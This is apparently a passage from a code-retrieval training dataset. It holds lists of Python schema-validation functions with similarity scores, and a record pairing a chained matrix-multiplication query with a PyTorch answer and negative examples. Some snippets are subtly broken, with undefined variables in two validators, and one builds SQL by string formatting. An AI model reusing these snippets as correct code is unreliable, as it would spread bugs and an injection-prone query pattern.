"def _validate_bool(instance: typing.Dict[str, typing.Any], schema: typing.Dict[str, typing.Any], path: typing.List[str]) -> None:\n if not isinstance(instance, dict):\n raise ValidationError('instance must be dict', path)\n valid_keys = {'_type', 'value'}\n required_keys = valid_keys\n schema_keys = set(instance.keys())\n invalid_keys = schema_keys - valid_keys - opt_federation_keys\n if invalid_keys:\n raise ValidationError('unexpected keys in schema: {}'.format(invalid_keys), path)\n missing_keys = required_keys - schema_keys\n if missing_keys:\n raise ValidationError('missing keys in schema: {}'.format(missing_keys), path)\n if instance['_type'] != 'bool':\n raise ValidationError('expected _type \"bool\"', path)\n if not isinstance(instance['value'], bool):\n raise ValidationError('value must be bool', path)",
"def validate(self, schema=os.path.join(os.path.dirname(__file__), 'am.xsd')):\n return validate_xml(schema, self.path, from_path=True)",
"def validate(self):\n\n # clear any previous xml errors\n clear_error_log()\n if self.schema_file is not None:\n try:\n # Attempt parsing the schema file\n schdoc = parse(self.schema_file)\n except XMLSyntaxError as e:\n # The schema was not parsable XML\n logging.warning('The schema XML file could not be parsed.')\n for item in e.error_log:\n logging.info(item)\n\n return False\n\n try:\n schema = XMLSchema(schdoc)\n except XMLSchemaParseError as e:\n # The schema document is XML, but it's not a schema\n logging.warning(\n 'The schema XML file was parsed, but it does not appear to be a valid XML Schema document.'\n )\n for item in e.error_log:\n logging.info(item)\n\n return False\n\n try:\n # Attempt parsing the data file\n data = parse(self.datafile)\n except XMLSyntaxError as e:\n # The data was not parsable XML\n logging.warning('The data XML file could not be parsed.')\n for item in e.error_log:\n logging.info(item)\n\n return False\n\n if self.schema_file is not None:\n if schema.validate(data):\n self.data = data\n return True\n\n logging.warning(\n 'The data does not conform to the provided schema.')\n for item in schema.error_log:\n logging.info(item)\n\n return False\n\n self.data = data\n\n return True",
"def isValid(dp: frictionless.package.Package, new_dp: frictionless.package.Package):\n val = frictionless.validate(new_dp)\n if (\n val[\"valid\"]\n and dp[\"resources\"][0][\"schema\"] == new_dp[\"resources\"][0][\"schema\"]\n ):\n logging.info(\"Returning valid and schema-compliant data\")\n return True\n else:\n logging.error(\"Data is not valid or the schema has changed\")\n print(val)\n return False",
"def validate_json(schema, doc):\n is_invalid = set(doc).difference(set(schema))\n if is_invalid:\n return False\n return True",
"def _schema_valid_prod(self, table: TableSchema) -> bool:\n disk_schema = self._get_stored_schema(table['name'])\n if not disk_schema:\n return False\n \n # Column and field order will probably not match\n # TODO don't call update_table_schema twice\n _, alter_reqs = update_table_schema(disk_schema, table)\n return len(alter_reqs) == 0",
"def validate(self) -> bool:\n\n # Start by reading in the blueprint schema json\n schema = json.loads(pkgutil.get_data(\"FactorioTools\", \"blueprintSchema.json\"))\n\n # Validate the object's schema against the blueprintSchema JSON\n try:\n jsonschema.validate(self.data, schema)\n return True\n except jsonschema.ValidationError:\n pass\n\n return False",
"def has_desired_schema(self):\n if self._new_table == self._old_table:\n if not self.rebuild:\n log.info(\"Table already has the desired schema. \")\n return True\n else:\n log.info(\n \"Table already has the desired schema. However \"\n \"--rebuild is specified, doing a rebuild instead\"\n )\n return False\n return False",
"def validate_subset_of_schema(self, schema):\n self.validate_schema_type(schema)\n\n if self.name != schema.name:\n raise AttributeSchemaError(\n \"Expected name '%s'; found '%s'\" % (schema.name, self.name)\n )\n\n if self.exclusive != schema.exclusive:\n raise AttributeSchemaError(\n \"Expected exclusive '%s' for attribute '%s'; found '%s'\"\n % (schema.exclusive, self.name, self.exclusive)\n )\n\n if self.default != schema.default:\n raise AttributeSchemaError(\n \"Expected default '%s' for attribute '%s'; found '%s'\"\n % (schema.default, self.name, self.default)\n )",
"def validate_schema(self, schema):\n if type(schema) is not type(self):\n raise AttributeSchemaError(\n \"Expected schema to have type '%s'; found '%s'\"\n % (type(self), type(schema))\n )\n\n if schema.name != self.name:\n raise AttributeSchemaError(\n \"Expected schema to have name '%s'; found '%s'\"\n % (self.name, schema.name)\n )",
"def validate_schema(doc_xml, schema_xml=None):\n doc_dml = deepcopy(doc_xml)\n\n doc_new = etree.Element(doc_xml.tag, nsmap={None: 'http://www.sii.cl/SiiDte'})\n doc_new[:] = doc_xml[:] # move children into new root\n doc_new.attrib.update(doc_xml.attrib) # copy attributes of the root node\n\n # reload xml\n buff = BytesIO(etree.tostring(doc_new, method='c14n'))\n xml = etree.parse(buff).getroot()\n\n if not schema_xml:\n schema_pth = resolve_schema(doc_xml)\n\n with open(schema_pth, 'rb') as fh:\n schema_dml = etree.parse(fh)\n\n schema = etree.XMLSchema(schema_xml)\n schema.assertValid(dml)\n\n return True # if no assertion gets thrown above, we can safely assume a `True` validity. ",
"def schemaExists(self, schema):\r\n r = self.fetchSqlRecords(\r\n \"SELECT count(*) FROM information_schema.schemata WHERE schema_name = '{}'\".format(schema))\r\n return r[0][0] > 0",
"def validate_class_schema(self, schema):\n json_schema_path = os.path.join(_ROOT,\n 'data',\n 'class_json_schema.json')\n json_schema = load_json_or_yaml(json_schema_path)\n return validate(schema, json_schema)",
"def _verify_schema(schema):\n assert type(schema) in [dict, tuple], f'Expected a dict or a tuple but got {type(schema)}'\n if isinstance(schema, tuple):\n assert len(schema) == 2, f'Expected a tuple with length 2 but got length {len(schema)}'\n if schema[1] is not None:\n assert isinstance(schema[1], schema[0]), f'{str(schema[1])} does not have expected type {str(schema)}'\n elif isinstance(schema, dict):\n for sub_schema in schema.values():\n _verify_schema(sub_schema)",
"def validate(self, descriptor, schema_id):\n try:\n jsonschema.validate(descriptor, self.load_schema(schema_id))\n return True\n\n except ValidationError as e:\n log.error(\"Failed to validate Descriptor against schema '{}'\"\n .format(schema_id))\n self.error_msg = e.message\n log.error(e.message)\n return\n\n except SchemaError as e:\n log.error(\"Invalid Schema '{}'\".format(schema_id))\n self.error_msg = e.message\n log.debug(e)\n return",
"def check_schema_uri(self):\n import asdf\n\n if self.schema_uri is not None:\n with log.augment_exception(\"Invalid ASDF schema URI:\", self.schema_uri):\n asdf.schema.load_schema(self.schema_uri)",
"def is_schema_compatible(self, for_writing_operations_too=False) -> bool:\n _LOG.debug(\n \"software.version\",\n postgis=_schema.get_postgis_versions(self._engine),\n explorer=explorer_version,\n )\n if for_writing_operations_too:\n return _schema.is_compatible_generate_schema(self._engine)\n else:\n return _schema.is_compatible_schema(self._engine)",
"def test_validate_schema(schema_path):\n # Make sure that each schema itself is valid.\n schema_tree = schema.load_schema(schema_path, resolve_references=True)\n schema.check_schema(schema_tree)",
"def validate_json_schema(self, json_schema):\n cls = validators.validator_for(json_schema)\n cls.check_schema(json_schema)",
"def _validate_against_schema(self, strand, data):\n schema = self._get_schema(strand)\n\n try:\n jsonschema_validate(instance=data, schema=schema)\n logger.debug(\"Validated %s against schema\", strand)\n\n except ValidationError as e:\n raise exceptions.invalid_contents_map[strand](str(e))",
"def checkProfileAgainstSchema(profile, schema):\n # what is required in a profile? use the json schema\n try:\n jsonschema.validate(profile, schema)\n except jsonschema.ValidationError as e:\n rsvLogger.exception(e)\n rsvLogger.info('ValidationError')\n return False\n except jsonschema.SchemaError as e:\n rsvLogger.exception(e)\n rsvLogger.info('SchemaError')\n return False\n # consider @odata.type, with regex\n return True",
"def is_standard(schema_obj):\n\n if isinstance(schema_obj, schema.Field):\n return is_standard(schema_obj.struct_type)\n elif isinstance(schema_obj, schema.Struct):\n standard_types = [\n 'google.protobuf.Duration',\n 'google.protobuf.Timestamp',\n 'weave.common.ResourceId',\n 'weave.common.ResourceName',\n ]\n return schema_obj.full_name in standard_types\n return False",
"def _validate(self):\n schema_version = util.schemas[self.schema_name]\n stored_schemas = util.stored_schemas\n\n try:\n schema_obj = stored_schemas[\n \"http://redfish.dmtf.org/schemas/v1/\" + schema_version]\n except KeyError:\n raise OneViewRedfishError(\"{} not found\".format(schema_version))\n\n resolver = jsonschema.RefResolver('', schema_obj, store=stored_schemas)\n jsonschema.validate(self.redfish, schema_obj, resolver=resolver)",
"def validate_property_schema(self, schema):\n json_schema_path = os.path.join(_ROOT,\n 'data',\n 'property_json_schema.json')\n json_schema = load_json_or_yaml(json_schema_path)\n return validate(schema, json_schema)",
"def validate(self, schema=None, callback=None):\n return hxl.schema(schema, callback).validate(self)",
"def is_valid(self):\n try:\n self.validate()\n return True\n except (TypeError, ValueError) as e:\n return False",
"def validate(xml_document, schema=None, cls=None, path=None, schema_path=None,\n use_defaults=True, namespaces=None, locations=None, base_url=None,\n defuse='remote', timeout=300, lazy=False):\n source, schema = get_context(\n xml_document, schema, cls, locations, base_url, defuse, timeout, lazy\n )\n schema.validate(source, path, schema_path, use_defaults, namespaces)",
"def validate(json_resp, schema, validictory_path, schema_base=None):\n # assumes /extern/validictory exists (see /cm for instructions)\n if not validictory_path in sys.path:\n sys.path.append(validictory_path)\n import validictory\n\n try:\n if schema_base and not json_resp[\"$schema\"].startswith(schema_base):\n print \"Warning: JSON schema is \", json_resp[\"$schema\"], \"instead of \", schema_base\n validictory.validate(json_resp, schema, required_by_default=False)\n return True\n except Exception as e:\n print \"Received exception %s while trying to validate: %s\" % (\n str(e), json_resp)\n return False",
"def validate(self, fqn, data, errors):\n\t\terrors.append(\"{}: validate() must be implemented for SchemaBase derived classes.\".format(self.__class__.__name__))\n\t\treturn False",
"def validate(self, json_data):\n self._errors = None\n success = True\n for item in self._schema:\n if not item.validate(json_data):\n success = False\n\n return success",
"def is_json_valid(json_data: dict, json_schema: dict) -> bool:\r\n try:\r\n validate(instance=json_data, schema=json_schema)\r\n except jsonschema.exceptions.ValidationError as err:\r\n return False\r\n return True",
"def match_schemas(w_schema, r_schema):\n if isinstance(w_schema, dict) and isinstance(r_schema, dict):\n # Array, Map, Enum, Fixed, Record, Error\n w_type = w_schema['type']\n r_type = r_schema['type']\n if w_type != r_type:\n return False\n if w_type == 'array':\n # 'Both schemas are arrays whose item types match'\n return match_schemas(w_schema['items'], r_schema['items'])\n elif w_type == 'map':\n # 'Both schemas are maps whose value types match'\n return match_schemas(w_schema['values'], r_schema['values'])\n elif w_type in ('enum', 'record', 'error'):\n # 'Both schemas are enums whose names match'\n # 'Both schemas are records with the same name'\n # Note: Futher checks must be applied after data is read in\n # `read_enum()` and `read_record()`\n return w_schema['name'] == r_schema['name']\n elif w_type == 'fixed':\n # 'Both schemas are fixed whose sizes and names match'\n return (\n w_schema['name'] == r_schema['name'] and\n w_schema['size'] == r_schema['size']\n )\n elif w_type == r_type:\n # Unknown type - just return True\n return True\n\n elif isinstance(w_schema, list) or isinstance(r_schema, list):\n # 'Either schema is a union'\n if isinstance(w_schema, list):\n # If the writer is a union, the check is applied in `read_union()`\n # when the correct schema is known.\n return True\n else:\n # If the reader is a union, ensure at least one of the schemas in\n # the reader's union matches the writer's schema.\n return any(match_schemas(w_schema, s) for s in r_schema)\n\n elif w_schema == r_schema:\n return True\n\n # Promotion cases:\n elif w_schema == 'int' and r_schema in ('long', 'float', 'double'):\n return True\n elif w_schema == 'long' and r_schema in ('float', 'double'):\n return True\n elif w_schema == 'float' and r_schema == 'double':\n return True\n elif w_schema == 'string' and r_schema == 'bytes':\n return True\n elif w_schema == 'bytes' and r_schema == 'string':\n return True\n\n return False",
"def is_valid(self) -> bool:\r\n try:\r\n self.shape\r\n return True\r\n except ValueError:\r\n return False",
"def _schema_has_sparse_features(schema: schema_pb2.Schema) -> bool:\n\n def _has_sparse_features(\n feature_container: Iterable[schema_pb2.Feature]\n ) -> bool:\n \"\"\"Helper function used to determine whether there are sparse features.\"\"\"\n for f in feature_container:\n if isinstance(f, schema_pb2.SparseFeature):\n return True\n if f.type == schema_pb2.STRUCT:\n if f.struct_domain.sparse_feature:\n return True\n return _has_sparse_features(f.struct_domain.feature)\n return False\n\n if schema.sparse_feature:\n return True\n return _has_sparse_features(schema.feature)",
"def is_valid(self) -> bool:\n return \\\n (self.spatial is None or all([v(self.spatial)\n for v, _ in self.spatial_validations])) \\\n and \\\n (self.temporal is None or all([v(self.temporal)\n for v, _ in self.temporal_validations]))",
"def validate_subset_of_schema(self, schema):\n super(BooleanAttributeSchema, self).validate_subset_of_schema(schema)\n\n if not self.values.issubset(schema.values):\n raise AttributeSchemaError(\n \"Values %s are not a subset of %s\"\n % (self.values, schema.values)\n )",
"def validate_against_schema(self, json_doc):\n if self.uri not in self.se.validation:\n raise RuntimeError(\"$validation is not defined for {} field; thus the json document could not be validated\".format(self.name))\n else:\n validate(json_doc, self.se.validation[self.uri])\n print('The JSON document is valid')",
"def validate(schema, record):\n if six.PY3:\n return Utils._py3_validate(schema, record)\n else:\n return Utils._py2_validate(schema, record)",
"def SchemaValidate(self, xsd):\n ret = libxml2mod.xmlTextReaderSchemaValidate(self._o, xsd)\n return ret",
"def schemaValidateDoc(self, doc):\n if doc is None: doc__o = None\n else: doc__o = doc._o\n ret = libxml2mod.xmlSchemaValidateDoc(self._o, doc__o)\n return ret",
"def validate(self, doc):\n return self.schema.validate(doc)",
"def validate_full_schema(self):\n #self.check_duplicate_labels()\n for record in self.extension_schema['schema']['@graph']:\n #self.check_whether_atid_and_label_match(record)\n if record['@type'] == \"rdfs:Class\":\n self.validate_class_schema(record)\n #self.validate_class_label(record[\"@id\"])\n self.validate_validation_field(record)\n elif record['@type'] == \"rdf:Property\":\n self.validate_property_schema(record)\n #self.validate_property_label(record[\"@id\"])\n #self.validate_domainIncludes_field(record[\"http://schema.org/domainIncludes\"])\n #self.validate_rangeIncludes_field(record[\"http://schema.org/rangeIncludes\"])\n #else:\n # raise ValueError('wrong @type value found: {}'.format(record))",
"def self_check(self, fqn, errors):\n\t\terrors.append(\"{}: self_check() must be implemented for SchemaBase derived classes.\".format(self.__class__.__name__))\n\t\treturn False",
"def validateXSD(cls,xmlstring,target):\n printMessage(cls,inspect.stack()[0][3],\n \"Validating against '%s' XSD..\"%(target))\n\n curdir = os.path.dirname(globals()['__file__'])\n if target==\"new\":\n xsd=\"%s/../bioinfer.xsd\"%curdir\n elif target==\"relaxed\":\n xsd=\"%s/../bioinfer.relaxed.xsd\"%curdir\n elif target==\"compatible\":\n xsd=\"%s/../bioinfer.relaxed.xsd\"%curdir\n else:\n printError(cls,inspect.stack()[0][3],\"Cannot validate '%s' format\"%target)\n return(False)\n \n doc = L.parseDoc(xmlstring)\n schemaCtxt = L.schemaNewParserCtxt(xsd)\n schema = schemaCtxt.schemaParse()\n validatorCtxt = schema.schemaNewValidCtxt()\n\n exitstatus = validatorCtxt.schemaValidateDoc(doc)\n valid = (exitstatus==0)\n if valid:\n printMessage(cls,inspect.stack()[0][3],\"Valid XML\")\n else:\n printError(cls,inspect.stack()[0][3],\"Invalid XML\")\n return(valid)",
"def CanHandle(arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:",
"def validate_schema(self):\n\n _schema_translator = {\n 'dav': 'http',\n 'davs': 'https',\n }\n\n _logger.debug(\n \"[%s]Validating URN schema: %s\",\n self.id,\n self.uri['scheme']\n )\n\n if self.uri['scheme'] in _schema_translator:\n\n _logger.debug(\n \"[%s]Using URN schema: %s\",\n self.id,\n _schema_translator[self.uri['scheme']]\n )\n\n self.uri['scheme'] = _schema_translator[self.uri['scheme']]\n\n else:\n _logger.debug(\n \"[%s]Using URN schema: %s\",\n self.id,\n self.uri['scheme']\n )",
"def validate_changeset(cls, changeset):\n\n if \"author_id\" not in changeset or changeset[\"author_id\"] is None:\n app.logger.warning(\"Missing `author_id` in changeset\")\n return False\n\n if \"planet\" not in changeset or changeset[\"planet\"] is None or \"kind\" not in changeset[\"planet\"]:\n app.logger.warning(\"Missing `planet` or `planet.kind` in changeset\")\n return False\n\n p_cls = LinkPlanet if changeset[\"planet\"][\"kind\"] == \"link\" else LinkedPicturePlanet\n return p_cls.validate_changeset(changeset)",
"def validate(self):\n\n if self.validate_all_fields():\n return True\n return False",
"def is_vendor(schema_obj):\n\n return isinstance(schema_obj, schema.Vendor)",
"def validate_subset_of_schema(self, schema):\n self.validate_schema_type(schema)\n\n for name, attr_schema in iteritems(self.schema):\n if not schema.has_attribute(name):\n raise AttributeContainerSchemaError(\n \"Attribute '%s' does not appear in schema\" % name\n )\n\n other_attr_schema = schema.get_attribute_schema(name)\n attr_schema.validate_subset_of_schema(other_attr_schema)",
"def schema_check(self):\n\n try:\n self.schema.assertValid(self.get_content())\n except lxml.etree.DocumentInvalid:\n logger.error(\"PDU failed schema check\")\n for line in self.pretty_print_content().splitlines():\n logger.warning(line)\n raise",
"def valid_type(self, data, errors):\n\t\terrors.append(\"{}: valid_type() must be implemented for SchemaBase derived classes.\".format(self.__class__.__name__))\n\t\treturn False",
"def valid(schema=None):\n def dec(fun):\n @wraps(fun)\n def d_func(self, ctx, data, *a, **kw):\n try:\n validate(data['params'], schema)\n except ValidationError as err:\n raise InvalidParams(err)\n except SchemaError as err:\n raise InternalError(err)\n return fun(self, ctx, data['params'], *a, **kw)\n return d_func\n return dec",
"def generate_valid(schema):\n LOG.debug(\"generate_valid: %s\" % schema)\n schema_type = schema[\"type\"]\n if isinstance(schema_type, list):\n # Just choose the first one since all are valid.\n schema_type = schema_type[0]\n return type_map_valid[schema_type](schema)",
"def CanHandle(arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:\n sparse_representation = tensor_representation.sparse_tensor\n if (len(sparse_representation.dense_shape.dim) != len(\n sparse_representation.index_column_names)):\n return False\n\n # All the index columns must be of integral types.\n for index_column in sparse_representation.index_column_names:\n depth, value_type = _GetNestDepthAndValueType(\n arrow_schema, path.ColumnPath(index_column))\n if depth != 1 or not pa.types.is_integer(value_type):\n return False\n\n depth, value_type = _GetNestDepthAndValueType(\n arrow_schema, path.ColumnPath(sparse_representation.value_column_name))\n return depth == 1 and _IsSupportedArrowValueType(value_type)",
"def is_valid(self, data_model: DataModel) -> bool:\n return all(constraint.is_valid(data_model) for constraint in self.constraints)",
"def is_valid(self, data_model: DataModel) -> bool:\n return all(constraint.is_valid(data_model) for constraint in self.constraints)",
"def is_valid_layout(self, layout):\n\n return layout in self._layout_infos",
"def is_typespace(schema_obj):\n\n return isinstance(schema_obj, schema.Typespace)",
"def __bool__(self):\n return self.is_valid",
"def is_valid(self):\n self.clean()\n return not bool(self.errors)",
"def is_valid(self):\n return _drafter.check_blueprint(self.content)",
"def _validate_against_schema(config):\n logging.info(\"Validating config file against the schema\")\n try:\n c = Core(source_data=config, schema_files=[CONFIG_SCHEMA])\n c.validate(raise_exception=True)\n except Exception as e:\n logging.error(\"Failed when validating schema: %s\", e)\n logging.info(\"Dumping rendered template:\\n%s\", dump_rendered_config_file(config))\n raise",
"def validate(cls,corpus,target):\n printWarning(cls,inspect.stack()[0][3],\n \"Preparing data for xsd validation..\")\n xmlstring = corpus.writeToString()\n printWarning(cls,inspect.stack()[0][3],\n \"Prepared\")\n xsd = Validator.validateXSD(xmlstring,target)\n semantic = Validator.validateSemantic(corpus,target)\n valid = (xsd and semantic)\n if not valid:\n printError(cls,inspect.stack()[0][3],\n \"Data not valid\")\n return(valid)",
"def validate(self, doc, schemaloc=False):\n if not (schemaloc or self._schemalocs):\n raise errors.ValidationError(\n \"No schemas to validate against! Try instantiating \"\n \"XmlValidator with use_schemaloc=True or setting the \"\n \"schema_dir param in __init__\"\n )\n\n root = utils.get_etree_root(doc)\n xsd = self._build_uber_schema(root, schemaloc)\n is_valid = xsd.validate(root)\n\n return XmlValidationResults(is_valid, xsd.error_log)",
"def is_valid_basis_instance(basis):\r\n\r\n sig = np.sin(2 * np.pi * np.arange(10)/10)\r\n shape = sig.shape\r\n\r\n try:\r\n conditions = [hasattr(basis, 'K'), hasattr(basis, 'projection'),\r\n callable(getattr(basis, 'projection', None)),\r\n isinstance(basis.projection(sig), np.ndarray),\r\n basis.projection(sig).shape == (basis.K,)+shape]\r\n except:\r\n return False\r\n\r\n return all(conditions)",
"def assertValid(self, doc):\n return self.schema.assertValid(doc)",
"def check_for_schema(cls):\n if not hasattr(cls, \"Schema\") or cls.Schema is None:\n raise PillowtalkError(\"Schema not found. @add_schema may not have been added to class definition.\")",
"def __bool__(self):\n return self.isValid()",
"def _is_instance_of(obj: dict, geojson_type: str) -> bool:\n try:\n schema_name = next(t + '.json' for t in GEOJSON_TYPES\n if t.lower() == geojson_type.lower())\n except StopIteration:\n raise GeoJSONError(f'Specified geojson_type ({geojson_type}) does '\n 'not match a supported GeoJSON type.')\n\n filename = DATA_DIR / schema_name\n with open(filename, 'r') as src:\n schema = json.load(src)\n\n return Draft7Validator(schema).is_valid(obj)",
"def is_common(schema_obj):\n\n return is_protobuf(schema_obj) or is_wdl(schema_obj)",
"def is_public(self):\n return self.schema_name == \"public\" or self.schema_name == \"test\"",
"def is_valid(self):\n self.logger.debug(\"In is_valid.\")\n\n document = self._get_raw_doc()\n\n session = iHMPSession.get_session()\n self.logger.info(\"Got iHMP session.\")\n\n # _error_message is intentionally unused\n (valid, _error_message) = session.get_osdf().validate_node(document)\n\n if 'prepared_from' not in self._links.keys():\n self.logger.error(\"Must have a 'prepared_from' linkage.\")\n valid = False\n\n self.logger.debug(\"Valid? %s\", str(valid))\n\n return valid",
"def is_valid(self):\n self.logger.debug(\"In is_valid.\")\n\n document = self._get_raw_doc()\n\n session = iHMPSession.get_session()\n self.logger.info(\"Got iHMP session.\")\n\n (valid, _error_message) = session.get_osdf().validate_node(document)\n\n if 'associated_with' not in self._links.keys():\n valid = False\n\n self.logger.debug(\"Valid? %s\", str(valid))\n\n return valid",
"def is_valid(self):\n self.errors = {}\n self._process_data()\n self._validate_changes()\n return not self.errors",
"def check_valid_schema(context):\n data = context.response.json()\n validate_schema(data)",
"def is_wdl(schema_obj):\n\n if isinstance(schema_obj, schema.Field):\n if schema_obj.data_type == schema.Field.DataType.ENUM:\n return is_wdl(schema_obj.enum_type)\n elif schema_obj.data_type == schema.Field.DataType.STRUCT:\n return is_wdl(schema_obj.struct_type)\n else:\n wdl_prefixes = (\n 'wdl.',\n 'weave.common.',\n )\n return schema_obj.full_name.startswith(wdl_prefixes)",
"def same_schema(self):\n return self._same_schema",
"def _schema_has_natural_language_domains(schema: schema_pb2.Schema) -> bool:\n for f in schema.feature:\n if f.WhichOneof('domain_info') == 'natural_language_domain':\n return True\n return False",
"def validate_subset_of_schema(self, schema):\n self.validate_schema_type(schema)\n\n if self.label != schema.label:\n raise KeypointsSchemaError(\n \"Expected keypoints label '%s'; found '%s'\"\n % (schema.label, self.label)\n )\n\n self.attrs.validate_subset_of_schema(schema.attrs)",
"def validate(self) -> bool:\n required = self.crud.validate(required=True)\n if required:\n raise ValueError(\n f\"Validation error. Required destination fields are not present in the crosswalk: {required}\"\n )",
"def check(self, description: Description) -> bool:\n return all(c.check(description) for c in self.constraints)",
"def is_annotation_valid(self, annotation):\n\n if not isinstance(annotation, LabelFeature):\n return False\n\n if self._label_schema is None:\n return True\n valid = self._valid_confidences(annotation)\n valid &= self._valid_geometry(annotation)\n return valid",
"def _is_valid(self):\n self._is_allows_valid()\n self._is_denies_valid()",
"def test_schema_valid(path, name, data):\n schemas = metaschemas()\n if name in ('release-schema.json', 'release-package-schema.json'):\n metaschema = schemas['release_package_metaschema']\n elif name == 'record-package-schema.json':\n metaschema = schemas['record_package_metaschema']\n elif name in ('project-schema.json', 'project-package-schema.json'):\n metaschema = schemas['project_package_metaschema']\n else:\n metaschema = schemas['metaschema']\n\n validate_json_schema(path, name, data, metaschema)",
"def validate(json_data: json,\n schema_id: str,\n schema_store: dict = None,\n validate_schema: bool = False,\n schema_search_path: str = None\n ) -> Tuple[bool, iter]:\n try:\n if not schema_search_path:\n schema_search_path = path.join(path.dirname(__file__), 'schemas')\n\n if not schema_store:\n schema_store = get_schema_store(validate_schema, schema_search_path)\n\n schema = schema_store.get(f'{BASE_URI}/{schema_id}')\n if validate_schema:\n Draft7Validator.check_schema(schema)\n\n schema_file_path = path.join(schema_search_path, schema_id)\n resolver = RefResolver(f'file://{schema_file_path}.json', schema, schema_store)\n\n if Draft7Validator(schema,\n format_checker=Draft7Validator.FORMAT_CHECKER,\n resolver=resolver\n ) \\\n .is_valid(json_data):\n return True, None\n\n errors = Draft7Validator(schema,\n format_checker=Draft7Validator.FORMAT_CHECKER,\n resolver=resolver\n ) \\\n .iter_errors(json_data)\n return False, errors\n\n except SchemaError as error:\n # handle schema error\n return False, error",
"def validate(instance, schema, cls=None, *args, **kwargs):\r\n if cls is None:\r\n cls = validator_for(schema)\r\n cls.check_schema(schema)\r\n cls(schema, *args, **kwargs).validate(instance)",
"def is_valid(self, data_model: DataModel) -> bool:\n if data_model is None:\n return True\n\n return all(c.is_valid(data_model) for c in self.constraints)"
] | [
"0.738567",
"0.6994796",
"0.69861853",
"0.67255765",
"0.66746897",
"0.6557599",
"0.64317065",
"0.6430458",
"0.6274206",
"0.62662953",
"0.61832917",
"0.61832917",
"0.61646706",
"0.6147451",
"0.61017865",
"0.6056857",
"0.6008853",
"0.60003716",
"0.59765136",
"0.5948833",
"0.59400743",
"0.59253293",
"0.5921405",
"0.59120375",
"0.58401763",
"0.58131814",
"0.5810842",
"0.5766985",
"0.5763496",
"0.5755105",
"0.57346547",
"0.5713257",
"0.56749755",
"0.566753",
"0.56642854",
"0.56590825",
"0.5653834",
"0.5650287",
"0.56358695",
"0.5634916",
"0.56307656",
"0.5618653",
"0.5571728",
"0.5543085",
"0.5540507",
"0.55372036",
"0.55315834",
"0.55308753",
"0.5529992",
"0.55234826",
"0.55218005",
"0.5518533",
"0.55166024",
"0.54987687",
"0.54911405",
"0.54579014",
"0.544742",
"0.542342",
"0.5418332",
"0.5411131",
"0.5408007",
"0.53960705",
"0.53768516",
"0.5373706",
"0.5372288",
"0.53688055",
"0.53565603",
"0.53547204",
"0.53547204",
"0.53462535",
"0.5339555",
"0.53368723",
"0.5326432",
"0.5324012",
"0.5318696",
"0.53179073",
"0.52937156",
"0.52863616",
"0.5277034",
"0.5275659",
"0.5274688",
"0.52733",
"0.5272507",
"0.5268667",
"0.5260351",
"0.52591014",
"0.5254786",
"0.52512103",
"0.5223165",
"0.522269",
"0.52222043",
"0.52199787",
"0.52193534",
"0.5218476",
"0.5214592",
"0.52056044",
"0.5201611",
"0.519716",
"0.518397",
"0.5183397"
] | 0.81319565 | 0 |
Matrix multiplication of chains of square matrices | def chain_matmul_square(As):
As_matmul = As
while As_matmul.shape[0] > 1:
if As_matmul.shape[0] % 2:
A_last = As_matmul[-1:]
else:
A_last = None
As_matmul = torch.matmul(As_matmul[0:-1:2], As_matmul[1::2])
if A_last is not None:
As_matmul = torch.cat([As_matmul, A_last], dim=0)
return As_matmul.squeeze(0) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def recursive_multiply(a, b):\n if len(a) == 2:\n return naive_multiply(a, b)\n\n a11 = a[0:int(len(a) / 2)]\n for index, row in enumerate(a11):\n a11[index] = row[0:int(len(row) / 2)]\n\n a12 = a[0:int(len(a) / 2)]\n for index, row in enumerate(a12):\n a12[index] = row[int(len(a) / 2):len(a)]\n\n a21 = a[int(len(a) / 2):len(a)]\n for index, row in enumerate(a21):\n a21[index] = row[0:int(len(row) / 2)]\n\n a22 = a[int(len(a) / 2):len(a)]\n for index, row in enumerate(a22):\n a22[index] = row[int(len(a) / 2):len(a)]\n\n b11 = b[0:int(len(b) / 2)]\n for index, row in enumerate(b11):\n b11[index] = row[0:int(len(row) / 2)]\n\n b12 = b[0:int(len(b) / 2)]\n for index, row in enumerate(b12):\n b12[index] = row[int(len(b) / 2):len(b)]\n\n b21 = b[int(len(b) / 2):len(b)]\n for index, row in enumerate(b21):\n b21[index] = row[0:int(len(row) / 2)]\n\n b22 = b[int(len(b) / 2):len(b)]\n for index, row in enumerate(b22):\n b22[index] = row[int(len(b) / 2):len(b)]\n\n c11 = matrix_add(recursive_multiply(a11, b11), recursive_multiply(a12, b21)) # C11 = A11*B11 + A12*B21\n c12 = matrix_add(recursive_multiply(a11, b12), recursive_multiply(a12, b22)) # C12 = A11*B12 + A12*B22\n c21 = matrix_add(recursive_multiply(a21, b11), recursive_multiply(a22, b21)) # C21 = A21*B11 + A22*B21\n c22 = matrix_add(recursive_multiply(a21, b12), recursive_multiply(a22, b22)) # C22 = A21*B12 + A22*B22\n\n # Append c12 to c11\n for row_index, row in enumerate(c11):\n for col_index, col in enumerate(c12):\n row.append(c12[row_index][col_index])\n\n # Append c22 to c21\n for row_index, row in enumerate(c21):\n for col_index, col in enumerate(c12):\n row.append(c22[row_index][col_index])\n\n # Append c21 to c11\n for i in c21:\n c11.append(i)\n\n return c11",
"def __mul__(self, other):\n #\n # TODO - your code here\n #\n final_matrix = []\n for i in range(self.h):\n temp_row = []\n for j in range(other.w):\n # take dot-product of row of\n # matrix in 1st arg with col of\n # matrix in 2nd arg\n temp_row.append(dot_product(get_row(self.g, i), get_col(other.g, j)))\n final_matrix.append(temp_row)\n return Matrix(final_matrix)\n # TODO - your code here",
"def matrix_mult(m1, m2):\n pass",
